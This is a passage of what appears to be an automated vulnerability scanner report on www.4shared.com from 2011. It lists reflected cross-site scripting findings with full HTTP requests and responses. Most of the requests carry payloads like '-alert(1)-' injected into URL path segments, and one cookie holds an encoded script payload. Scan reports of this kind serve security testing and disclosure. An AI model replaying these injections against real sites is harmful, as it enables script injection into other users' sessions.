GET /icons/16x1634cc4"-alert(1)-"8ad53ce0672/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons/16x1634cc4"-alert(1)-"8ad53ce0672/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=888C0178FF1052C414FDAA58E2CE5F49.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:39 GMT
Connection: close
Content-Length: 36123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x1634cc4"-alert(1)-"8ad53ce0672/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.261. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 740d4'-alert(1)-'1da9226c8e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images740d4'-alert(1)-'1da9226c8e8/blueBanner_plus.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images740d4'-alert(1)-'1da9226c8e8/blueBanner_plus.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:39 GMT
Content-Length: 36227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images740d4'-alert(1)-'1da9226c8e8/blueBanner_plus.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
...[SNIP]...

1.262. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cedc"-alert(1)-"98d34b98a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:37 GMT
Content-Length: 36227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.263. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aef3a"-alert(1)-"93d664da704 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.264. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be69e'-alert(1)-'0e3c1d84355 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/blueBanner_plus.gifbe69e'-alert(1)-'0e3c1d84355 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/blueBanner_plus.gifbe69e'-alert(1)-'0e3c1d84355
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:50 GMT
Content-Length: 36227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images/blueBanner_plus.gifbe69e'-alert(1)-'0e3c1d84355',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.265. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/index-premium-features.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8493f"-alert(1)-"1139657276e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images8493f"-alert(1)-"1139657276e/index-premium-features.png HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images8493f"-alert(1)-"1139657276e/index-premium-features.png
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:32 GMT
Content-Length: 36262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images8493f"-alert(1)-"1139657276e/index-premium-features.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.266. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/index-premium-features.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdf9'-alert(1)-'bdfba0891e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagesffdf9'-alert(1)-'bdfba0891e7/index-premium-features.png HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagesffdf9'-alert(1)-'bdfba0891e7/index-premium-features.png
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:34 GMT
Content-Length: 36251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/imagesffdf9'-alert(1)-'bdfba0891e7/index-premium-features.png',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox()
...[SNIP]...

1.267. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/index-premium-features.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49910'-alert(1)-'1ee2a7bb0b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/index-premium-features.png49910'-alert(1)-'1ee2a7bb0b9 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/index-premium-features.png49910'-alert(1)-'1ee2a7bb0b9
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:45 GMT
Content-Length: 36251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images/index-premium-features.png49910'-alert(1)-'1ee2a7bb0b9',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.268. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/index-premium-features.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15de3"-alert(1)-"eb019ce0128 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/index-premium-features.png15de3"-alert(1)-"eb019ce0128 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/index-premium-features.png15de3"-alert(1)-"eb019ce0128
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:43 GMT
Content-Length: 36251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/index-premium-features.png15de3"-alert(1)-"eb019ce0128";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.269. http://www.4shared.com/images/spacer.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0496'-alert(1)-'73c718879e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagesc0496'-alert(1)-'73c718879e3/spacer.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagesc0496'-alert(1)-'73c718879e3/spacer.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:39 GMT
Content-Length: 36182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/imagesc0496'-alert(1)-'73c718879e3/spacer.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.270. http://www.4shared.com/images/spacer.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d78a"-alert(1)-"1ddd3f867cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:37 GMT
Content-Length: 36182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.271. http://www.4shared.com/images/spacer.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/spacer.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ced28'-alert(1)-'14abb55775a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/spacer.gifced28'-alert(1)-'14abb55775a HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/spacer.gifced28'-alert(1)-'14abb55775a
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:50 GMT
Content-Length: 36182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images/spacer.gifced28'-alert(1)-'14abb55775a',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.272. http://www.4shared.com/images/spacer.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/spacer.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce9c3"-alert(1)-"bd60f50799e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/spacer.gifce9c3"-alert(1)-"bd60f50799e HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/spacer.gifce9c3"-alert(1)-"bd60f50799e
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/spacer.gifce9c3"-alert(1)-"bd60f50799e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.273. http://www.4shared.com/index.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16991'-alert(1)-'f97f40b13f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jsp16991'-alert(1)-'f97f40b13f7 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /index.jsp16991'-alert(1)-'f97f40b13f7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A3AB8E9BB56169BEEC15DFDECE3251DC.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:38 GMT
Connection: close
Content-Length: 36108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/index.jsp16991'-alert(1)-'f97f40b13f7',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.274. http://www.4shared.com/index.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e191f"-alert(1)-"6e354f00eec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jspe191f"-alert(1)-"6e354f00eec HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
